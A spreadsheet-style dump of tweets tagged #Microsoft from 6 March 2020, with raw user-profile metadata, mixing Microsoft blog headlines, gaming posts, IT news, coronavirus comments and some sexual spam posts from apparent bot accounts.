    <t>Fri Mar 06 02:55:31 +0000 2020</t>
  </si>
  <si>
    <t>Black History Month: Building a better future together
#diversity #Microsoft
https://t.co/3KnEbF3AWq</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:30 +0000 2020</t>
  </si>
  <si>
    <t>Black History Month: Building a better future together
#The Official Microsoft Blog #Microsoft
https://t.co/3KnEbF3AWq</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:28 +0000 2020</t>
  </si>
  <si>
    <t>U.S. Air Force and Microsoft partner to empower airmen with modern IT
#Microsoft Teams #Microsoft
https://t.co/hFpf45rJPs</t>
  </si>
  <si>
    <t>U.S. Air Force and Microsoft partner to empower airmen with modern IT
#Azure Government #Microsoft
https://t.co/hFpf45rJPs</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:27 +0000 2020</t>
  </si>
  <si>
    <t>U.S. Air Force and Microsoft partner to empower airmen with modern IT
#Featured #Microsoft
https://t.co/hFpf45rJPs</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:26 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft for Startups unlocks $1 billion in sales opportunities for B2B startups; adds GitHub and Microsoft Power Platform
#The Official Microsoft Blog #Microsoft
https://t.co/bVnRQcQcvV</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:24 +0000 2020</t>
  </si>
  <si>
    <t>Black History Month: Leaning In
#Microsoft Life #Microsoft
https://t.co/SkPzpqzDM1</t>
  </si>
  <si>
    <t>Black History Month: Leaning In
#Blacks at Microsoft #Microsoft
https://t.co/SkPzpqzDM1</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:23 +0000 2020</t>
  </si>
  <si>
    <t>Black History Month: Leaning In
#Black History Month #Microsoft
https://t.co/SkPzpqzDM1</t>
  </si>
  <si>
    <t>Black History Month: Leaning In
#The Official Microsoft Blog #Microsoft
https://t.co/SkPzpqzDM1</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:22 +0000 2020</t>
  </si>
  <si>
    <t>Black History Month: Leaning In
#Featured #Microsoft
https://t.co/SkPzpqzDM1</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:21 +0000 2020</t>
  </si>
  <si>
    <t>Delivering on the promise of security AI to help defenders protect todays hybrid environments
#Security #Microsoft
https://t.co/GxGEKp9fIw</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:20 +0000 2020</t>
  </si>
  <si>
    <t>Delivering on the promise of security AI to help defenders protect todays hybrid environments
#cybersecurity #Microsoft
https://t.co/GxGEKp9fIw</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:19 +0000 2020</t>
  </si>
  <si>
    <t>Delivering on the promise of security AI to help defenders protect todays hybrid environments
#The Official Microsoft Blog #Microsoft
https://t.co/GxGEKp9fIw</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:18 +0000 2020</t>
  </si>
  <si>
    <t>Delivering on the promise of security AI to help defenders protect todays hybrid environments
#Featured #Microsoft
https://t.co/GxGEKp9fIw</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:17 +0000 2020</t>
  </si>
  <si>
    <t>Creating a world of good: Microsoft launches the Global Social Entrepreneurship program
#startups #Microsoft
https://t.co/Dyk0ZVjAoR</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:16 +0000 2020</t>
  </si>
  <si>
    <t>Creating a world of good: Microsoft launches the Global Social Entrepreneurship program
#Global Social Entrepreneurship #Microsoft
https://t.co/Dyk0ZVjAoR</t>
  </si>
  <si>
    <t>Creating a world of good: Microsoft launches the Global Social Entrepreneurship program
#The Official Microsoft Blog #Microsoft
https://t.co/Dyk0ZVjAoR</t>
  </si>
  <si>
    <t>Fri Mar 06 02:55:15 +0000 2020</t>
  </si>
  <si>
    <t>Creating a world of good: Microsoft launches the Global Social Entrepreneurship program
#Featured #Microsoft
https://t.co/Dyk0ZVjAoR</t>
  </si>
  <si>
    <t>Fri Mar 06 02:51:22 +0000 2020</t>
  </si>
  <si>
    <t>How to wipe yourself out with the #ToiletPaperEmergency 
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Twitter #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping #Kleenex
https://t.co/viHNUWnpDz</t>
  </si>
  <si>
    <t>{'id': 41055350, 'id_str': '41055350', 'name': 'Viet Nam', 'screen_name': 'RebuildVietnam', 'location': 'Viet Nam', 'description': 'Plan Quickly.  Rebuild Quickly, or be Destroyed Quickly.  Free the People.  #FairUse.', 'url': 'https://t.co/qrAhKeMhlH', 'entities': {'url': {'urls': [{'url': 'https://t.co/qrAhKeMhlH', 'expanded_url': 'https://rebuildvietnam.blogspot.com', 'display_url': 'rebuildvietnam.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 422, 'friends_count': 1391, 'listed_count': 1, 'created_at': 'Tue May 19 04:33:32 +0000 2009', 'favourites_count': 484, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2490, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '642D8B', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme8/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme8/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/553638472842371072/lsxHqzHh_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/553638472842371072/lsxHqzHh_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/41055350/1513882557', 'profile_link_color': '1B95E0',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</si>
  <si>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02:48:48 +0000 2020</t>
  </si>
  <si>
    <t>I love the way you care in bed #Naperville   #review #microsoft https://t.co/KosR9kYgPJ</t>
  </si>
  <si>
    <t>{'id': 1235652436968304641, 'id_str': '1235652436968304641', 'name': 'Kathleen Montgomery', 'screen_name': 'cradanosgal', 'location': 'Jackson, USA', 'description': 'When you realize you want to spend the rest of your life with somebody, you want the rest of your life to start as soon as possible.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 17, 'listed_count': 0, 'created_at': 'Thu Mar 05 19:44:44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'http://pbs.twimg.com/profile_images/1235655003097923585/S2OCl6Iw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235655003097923585/S2OCl6Iw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235652436968304641/1583438121',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</si>
  <si>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02:45:00 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - The Complete Splunk Beginner Course #udemycoupon -&amp;gt; https://t.co/iqFoR0p6YL
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>{'id': 970572251090186240, 'id_str': '970572251090186240', 'name': 'Coupon Free', 'screen_name': 'couponfree01', 'location': 'Dallas, NC', 'description': 'Visit https://t.co/KlWHEisgbp  for 100% free coupon codes from #Udemy. Updated hourly so we always have the freshest coupons. #UdemyCoupon #UdemyDiscount', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/KlWHEisgbp', 'expanded_url': 'http://couponfree.uk', 'display_url': 'couponfree.uk', 'indices': [6, 29]}]}}, 'protected': False, 'followers_count': 2095, 'friends_count': 4466, 'listed_count': 28, 'created_at': 'Mon Mar 05 08:10:31 +0000 2018', 'favourites_count': 93, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14914,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'http://pbs.twimg.com/profile_images/970573416821547009/oDkr4BWt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/970573416821547009/oDkr4BWt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/970572251090186240/1520237894',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</si>
  <si>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02:44:35 +0000 2020</t>
  </si>
  <si>
    <t>The Confession.
How China panic the world into a greater crisis.
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Twitter #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping 
https://t.co/FYJ2KhBYmT</t>
  </si>
  <si>
    <t>Fri Mar 06 02:41:24 +0000 2020</t>
  </si>
  <si>
    <t>Take me greedily! I gently ask, now everything is not important, I WANT WANT !!!!
https://t.co/rm8j8fvoZQ
#Wichita
 #trap #microsoft https://t.co/DFTC6DDTm0</t>
  </si>
  <si>
    <t>{'id': 1234600410767405056, 'id_str': '1234600410767405056', 'name': 'Dana Jackson', 'screen_name': 'marlicalfi', 'location': 'Fargo, USA', 'description': 'The heart wants what it wants. Thereâ€™s no logic to these things. You meet someone and you fall in love and thatâ€™s that', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 26, 'listed_count': 0, 'created_at': 'Mon Mar 02 22:04:16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'http://pbs.twimg.com/profile_images/1234698008224260096/5lawhc50_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234698008224260096/5lawhc50_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234600410767405056/1583209950',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</si>
  <si>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02:41:13 +0000 2020</t>
  </si>
  <si>
    <t>The Division 2 The last of us DLC . @Neil_Druckmann  
 . #ubisoft #thedivision2 #xboxonex #microsoft #gamer #gaming #oled https://t.co/ls6QXmSrRX</t>
  </si>
  <si>
    <t>{'id': 142770091, 'id_str': '142770091', 'name': 'Mario Looney Zaccaria ðŸ‡¨ðŸ‡®', 'screen_name': 'HAUJOBBZ', 'location': 'UK', 'description': 'â˜¯ï¸ Happy free spirit and crazy ðŸ‰ Zen Practice Health and Fitness * Dry Eye Specialist * Anti Aging * Positive Motivation * Gaming * Graphic Animation â™ï¸', 'url': 'https://t.co/yJgxMnL9wQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/yJgxMnL9wQ', 'expanded_url': 'https://www.facebook.com/groups/455149017841336/', 'display_url': 'facebook.com/groups/4551490â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 471, 'friends_count': 620, 'listed_count': 65, 'created_at': 'Tue May 11 18:25:36 +0000 2010', 'favourites_count': 507, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4857,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'http://pbs.twimg.com/profile_images/1193341653291016193/BxmJ7F8S_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1193341653291016193/BxmJ7F8S_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/142770091/1573349797',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</si>
  <si>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02:39:55 +0000 2020</t>
  </si>
  <si>
    <t>The Division 2 Warlords of New York DLC is just so beautiful , im sure Ubisoft team were inspired by the last of us @Neil_Druckmann . #ubisoft #thedivision2 #xboxonex #microsoft #gamer #gaming #oled https://t.co/5QyuPTtRyz</t>
  </si>
  <si>
    <t>Fri Mar 06 02:38:32 +0000 2020</t>
  </si>
  <si>
    <t>The Division 2 Warlords of New York DLC looks amazing , reminds me of the last of us  @Neil_Druckmann #ubisoft #thedivision2 #xboxonex #microsoft #gamer #gaming #oled https://t.co/rTRRj8kwRm</t>
  </si>
  <si>
    <t>Fri Mar 06 02:36:26 +0000 2020</t>
  </si>
  <si>
    <t>The Division 2 Warlords of New York DLC is just so beautiful . #ubisoft #thedivision2 #xboxonex #microsoft #gamer #gaming #oled https://t.co/gd7Wz2hfK6</t>
  </si>
  <si>
    <t>Fri Mar 06 02:36:01 +0000 2020</t>
  </si>
  <si>
    <t>The Division 2 Warlords of New York DLC is just so beautiful . #ubisoft #thedivision2 #xboxonex #microsoft #gamer #gaming #oled https://t.co/w8Ks6GbBxA</t>
  </si>
  <si>
    <t>Fri Mar 06 02:35:54 +0000 2020</t>
  </si>
  <si>
    <t>Hi guys! I want a guy or a girl  I want sex #Elgin   #uk #microsoft https://t.co/0Btew5O0Ir</t>
  </si>
  <si>
    <t>{'id': 1235593327594147848, 'id_str': '1235593327594147848', 'name': 'Tina Belgum', 'screen_name': 'secromytso', 'location': 'Coral Springs, USA', 'description': 'The best and most beautiful things in the world cannot be seen nor even touched, but just felt in the heart.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 21, 'listed_count': 0, 'created_at': 'Thu Mar 05 15:49:46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'http://pbs.twimg.com/profile_images/1235613935858069504/6rexg52H_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235613935858069504/6rexg52H_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235593327594147848/1583428335',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</si>
  <si>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02:35:40 +0000 2020</t>
  </si>
  <si>
    <t>The Division 2 Warlords of New York DLC is just so beautiful . #ubisoft #thedivision2 #xboxonex #microsoft #gamer #gaming #oled https://t.co/Jvqtaqv4Vm</t>
  </si>
  <si>
    <t>Fri Mar 06 02:35:17 +0000 2020</t>
  </si>
  <si>
    <t>What are some of the things youre pretending not to know? Provocations from @drjasonfox 
#vinspire #velrada #progressisthepoint #microsoft</t>
  </si>
  <si>
    <t>{'id': 54475378, 'id_str': '54475378', 'name': 'Velrada', 'screen_name': 'Velrada', 'location': 'Australia', 'description': 'Game changing jumps in productivity and service arenâ€™t easy. We make technology work for business.', 'url': 'http://t.co/eUPAqX2tNs', 'entities': {'url': {'urls': [{'url': 'http://t.co/eUPAqX2tNs', 'expanded_url': 'http://www.velrada.com', 'display_url': 'velrada.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 286, 'friends_count': 748, 'listed_count': 9, 'created_at': 'Tue Jul 07 06:50:13 +0000 2009', 'favourites_count': 33, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 239, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '603843', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1190179286063423489/OU7hBCFF_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1190179286063423489/OU7hBCFF_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/54475378/1572596256', 'profile_link_color': '601C4D',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</si>
  <si>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02:35:02 +0000 2020</t>
  </si>
  <si>
    <t>FSF Sends Microsoft A Blank Hard Drive For Sending Back The Windows 7 Source Code. 
https://t.co/VL78Qdck69 #FSF #Windows7 #Microsoft #Australia</t>
  </si>
  <si>
    <t>{'id': 1945550624, 'id_str': '1945550624', 'name': 'Nebulex - Best Information Technology Services', 'screen_name': 'Nebulex_Oz', 'location': 'Sydney, Australia ', 'description': 'Computer Networking, IT management - maintenance &amp; support, Websites, Online Marketing, Systems Integration Services since 2009. #CISCO Call +61 2 9045 7600', 'url': 'http://t.co/Kq6AIPoo5m', 'entities': {'url': {'urls': [{'url': 'http://t.co/Kq6AIPoo5m', 'expanded_url': 'http://www.nebulex.com.au', 'display_url': 'nebulex.com.au', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 581, 'friends_count': 497, 'listed_count': 1, 'created_at': 'Tue Oct 08 01:12:55 +0000 2013', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 727,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'http://pbs.twimg.com/profile_images/1020524210060447745/xOixAMJi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1020524210060447745/xOixAMJi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1945550624/1531814315',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</si>
  <si>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02:34:32 +0000 2020</t>
  </si>
  <si>
    <t>EY, Microsoft and ConsenSys Launch Enterprise Platform on Ethereum Mainnet https://t.co/hrmGrKq76O #Ethereum #EY #ErnstYoung #Microsoft #ConsenSys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</si>
  <si>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8203, 'friends_count': 8945, 'listed_count': 38, 'created_at': 'Tue Nov 06 20:50:01 +0000 2018', 'favourites_count': 328, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 139710,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</si>
  <si>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02:34:03 +0000 2020</t>
  </si>
  <si>
    <t>New Unified Interface for Microsoft Dynamics 365 Customer Engagement (CRM) Coming in October 2020.
#Microsoft #Dynamics365 #HappyD365 #Dynamics https://t.co/OMpfAPo5pE</t>
  </si>
  <si>
    <t>{'id': 621672234, 'id_str': '621672234', 'name': 'S R I N ðŸ…°ï¸ T H â€¢ ðŸ…¿ E G A â€¢ #D3ï¸âƒ£6ï¸âƒ£5ï¸âƒ£', 'screen_name': 'SrinathPega', 'location': 'Hyderabad, Telangana', 'description': 'IT Professional â€¢ Blogger â€¢ Programmer â€¢ Geek â€¢ Traveller â€¢ fashion â€¢ Foodie Web:https://t.co/DB7o9kdfjT eMail: dr.pega@hotmail.com &amp; MSD365CRM@hotmail.com', 'url': 'https://t.co/Cuq1HhIpdF', 'entities': {'url': {'urls': [{'url': 'https://t.co/Cuq1HhIpdF', 'expanded_url': 'https://www.srinathpega.com', 'display_url': 'srinathpega.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/DB7o9kdfjT', 'expanded_url': 'http://srinathpega.com', 'display_url': 'srinathpega.com', 'indices': [81, 104]}]}}, 'protected': False, 'followers_count': 57, 'friends_count': 480, 'listed_count': 1, 'created_at': 'Fri Jun 29 05:18:56 +0000 2012', 'favourites_count': 217, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 689,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'http://pbs.twimg.com/profile_images/1231999159948824576/PKL89wvN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231999159948824576/PKL89wvN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/621672234/1572974774',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</si>
  <si>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02:31:41 +0000 2020</t>
  </si>
  <si>
    <t>Welcome to the Pirate Life! | Sub Goal: 3/10  https://t.co/yCF3ANZeTs #SeaOfThieves #pirate #pc #pcgaming #gaming #microsoft #hangout #adventure #live #streaming #sailing #fun #twitch #twitchtv #twitchstreamer #twitchcommunity #TwitchAffilate #TwitchPrime #gaming</t>
  </si>
  <si>
    <t>{'id': 1209516150595428352, 'id_str': '1209516150595428352', 'name': 'EclecticHD', 'screen_name': 'EclecticHd', 'location': '', 'description': 'Always on a Streaming Service. Sponsored by: @TheRogueEnergy ðŸŽ®  | ðŸ’¥Twitch Affiliate ðŸ’¥', 'url': 'https://t.co/27QUYFi7ml', 'entities': {'url': {'urls': [{'url': 'https://t.co/27QUYFi7ml', 'expanded_url': 'http://twitch.tv/eclectichd', 'display_url': 'twitch.tv/eclectichd', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 134, 'friends_count': 231, 'listed_count': 0, 'created_at': 'Tue Dec 24 16:48:29 +0000 2019', 'favourites_count': 826, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1096, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1210952953005260801/A0rC_kBe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210952953005260801/A0rC_kBe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1209516150595428352/1577208495',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</si>
  <si>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02:31:28 +0000 2020</t>
  </si>
  <si>
    <t>Microsofts Airband Initiative in 25 states at midpoint
#RuralBroadbandProject #Microsoft
Source: https://t.co/dF6Lgt4J2i
By https://t.co/FEmp3sijJF</t>
  </si>
  <si>
    <t>{'id': 1029053981245370368, 'id_str': '1029053981245370368', 'name': 'Telecom News Aggregator', 'screen_name': 'TelecomNewsAgg', 'location': 'Tokyo-to, Japan', 'description': 'Telecom News Aggregator is a news aggregation service for telecom.\n#5G #Telecom', 'url': 'https://t.co/UOzFqNQKFi', 'entities': {'url': {'urls': [{'url': 'https://t.co/UOzFqNQKFi', 'expanded_url': 'https://telecomnewsaggregator.blogspot.com/', 'display_url': 'telecomnewsaggregator.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 99, 'friends_count': 241, 'listed_count': 6, 'created_at': 'Mon Aug 13 17:16:02 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 20393,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'http://pbs.twimg.com/profile_images/1029059060237094912/NqQRG5FW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1029059060237094912/NqQRG5FW_normal.jpg', 'profile_link_color': '169FE6',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</si>
  <si>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02:29:37 +0000 2020</t>
  </si>
  <si>
    <t>Yet another reason I choose to work at #Microsoft! https://t.co/AwvxS06ZIB</t>
  </si>
  <si>
    <t>{'id': 21811608, 'id_str': '21811608', 'name': 'Jeremy Curry', 'screen_name': 'jeremy_curry', 'location': 'Spencerville, IN', 'description': "Christ follower, sinner saved by grace, God's servant to reach the lost and discouraged, husband of Erin, father, losing my eyesight but not my vision", 'url': 'https://t.co/LlamMeZUuy', 'entities': {'url': {'urls': [{'url': 'https://t.co/LlamMeZUuy', 'expanded_url': 'http://www.YourBlindFaith.com', 'display_url': 'YourBlindFaith.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 251, 'friends_count': 377, 'listed_count': 12, 'created_at': 'Tue Feb 24 23:24:01 +0000 2009', 'favourites_count': 27, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2740,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'http://pbs.twimg.com/profile_images/729830571598209024/zCmttEn5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/729830571598209024/zCmttEn5_normal.jpg',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</si>
  <si>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02:26:20 +0000 2020</t>
  </si>
  <si>
    <t>Yahoo!, AOL, OneSearch results biased in favor of parent company Verizon Medias websites
 https://t.co/SYL3fvKpzA #microsoft does the same: https://t.co/AEooJUex3F</t>
  </si>
  <si>
    <t>Fri Mar 06 02:24:36 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Issues Fix for Windows 10 Drivers Blocked by Core Isolation
https://t.co/K7z1QgXExq https://t.co/GagsrMjVWa</t>
  </si>
  <si>
    <t>{'id': 2235329532, 'id_str': '2235329532', 'name': 'John Morgan', 'screen_name': 'johnmorganFL', 'location': 'For now, Earth', 'description': 'Even when he has a 50/50 shot, the odds are 80/20 in his favor ðŸš€', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 13493, 'friends_count': 12723, 'listed_count': 44, 'created_at': 'Sun Dec 08 02:06:19 +0000 2013', 'favourites_count': 125, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14487,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'http://pbs.twimg.com/profile_images/1121812566098030593/yIJ3zzjt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1121812566098030593/yIJ3zzjt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2235329532/1388183287', 'profile_link_color': '2FC2EF',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</si>
  <si>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02:20:48 +0000 2020</t>
  </si>
  <si>
    <t>Do you work with #AzurePolicy? 
Wish there was a 'DenyIfNotExist' effect to prevent object modification (and thus compliance drift)? 
- Vote for the feature request here: https://t.co/WnMTscu7XI
#Azure #Microsoft #Cloud #Governance #Policy https://t.co/gd6JS0jjKV</t>
  </si>
  <si>
    <t>{'id': 906607038, 'id_str': '906607038', 'name': 'Adin Ermie', 'screen_name': 'AdinErmie', 'location': 'Burlington, ON, Canada', 'description': 'Microsoft MVP, Cloud Solution Architect - Apps and Infra @ Microsoft, Author, Blogger. Opinions/Tweets are my own', 'url': 'https://t.co/z3c0j8oKbA', 'entities': {'url': {'urls': [{'url': 'https://t.co/z3c0j8oKbA', 'expanded_url': 'http://adinermie.com', 'display_url': 'adinermie.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 965, 'friends_count': 325, 'listed_count': 67, 'created_at': 'Fri Oct 26 19:21:29 +0000 2012', 'favourites_count': 4237, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5030,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'http://pbs.twimg.com/profile_images/482301359148900353/XlSlddSS_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/482301359148900353/XlSlddSS_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/906607038/1569514149',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</si>
  <si>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02:17:56 +0000 2020</t>
  </si>
  <si>
    <t>So #microsoft applied work from home policy for most of its employees to avoid #corona #virus 
Interesting... 
#WFH</t>
  </si>
  <si>
    <t>{'id': 173897219, 'id_str': '173897219', 'name': 'Tariq Abubaker', 'screen_name': 'taq_abubaker', 'location': 'Kuwait', 'description': 'Enterprise &amp; Software Architect @KFHGroup|Founder &amp; Organizer of @azure_q8|Azure,DevOps,.Net,Docker,K8s,OSS,blog|YouTube Code it with Tariq|Tweets are my own', 'url': 'https://t.co/Y1EmI5SbN0', 'entities': {'url': {'urls': [{'url': 'https://t.co/Y1EmI5SbN0', 'expanded_url': 'https://tariqabubaker.wordpress.com/', 'display_url': 'tariqabubaker.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 48, 'friends_count': 249, 'listed_count': 1, 'created_at': 'Mon Aug 02 16:47:01 +0000 2010', 'favourites_count': 271, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 554,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'http://pbs.twimg.com/profile_images/1229506544989097985/ZfAyxqij_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229506544989097985/ZfAyxqij_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/173897219/1583231248',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</si>
  <si>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02:17:23 +0000 2020</t>
  </si>
  <si>
    <t>So HBO is turning PlayStations game The Last of Us into a TV series 
#videogames #gamer #gamerguy #twitch #mixer #streamer #stream #gamerlife #fun #gaming #console #PC #mobile #geek #windows10 #Microsoft #Sony... https://t.co/McVUvDXpmR</t>
  </si>
  <si>
    <t>{'id': 389130545, 'id_str': '389130545', 'name': 'Lazy Heroes', 'screen_name': 'LazyHeroes', 'location': 'MD', 'description': 'Up Coming YouTube Comedy Channel, Your Place For Gaming Info! :-P (@yaB0iiMickey @Mr_Mons and Chris Daydreamer Friday)', 'url': 'http://t.co/I8U36mcPWg', 'entities': {'url': {'urls': [{'url': 'http://t.co/I8U36mcPWg', 'expanded_url': 'http://www.youtube.com/user/LazyHeroes?feature=mhee', 'display_url': 'youtube.com/user/LazyHeroeâ€¦', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 44, 'friends_count': 148, 'listed_count': 2, 'created_at': 'Tue Oct 11 22:25:49 +0000 2011', 'favourites_count': 98, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 559,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'http://pbs.twimg.com/profile_images/641796515808313344/OgqQkn6p_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/641796515808313344/OgqQkn6p_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/389130545/1370818349',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</si>
  <si>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02:15:05 +0000 2020</t>
  </si>
  <si>
    <t>Meet the 13-year-old girl who impressed #Microsofts Satya Nadella with her #innovation. #K12 #education #GirlsInSTEM https://t.co/pey5jUzxmX</t>
  </si>
  <si>
    <t>{'id': 1531785438, 'id_str': '1531785438', 'name': 'Kristen ðŸ‡ºðŸ‡¸', 'screen_name': 'KristenTurzak', 'location': 'Clearwater, FL', 'description': 'Travel ðŸ›« Photography ðŸ“¸ Boy Mom âš¾ï¸ | Views are my own &amp; retweets are not endorsements. ðŸ‘', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 653, 'friends_count': 1519, 'listed_count': 71, 'created_at': 'Wed Jun 19 19:42:48 +0000 2013', 'favourites_count': 26483, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 17260,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'http://pbs.twimg.com/profile_images/561003730204901376/WlowCCOT_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/561003730204901376/WlowCCOT_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1531785438/1511020238', 'profile_link_color': '91D2FA',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</si>
  <si>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02:13:57 +0000 2020</t>
  </si>
  <si>
    <t>How schools can ramp up remote learning programs quickly with #MicrosoftTeams #Microsoft EDU https://t.co/TtZAYLFuqN</t>
  </si>
  <si>
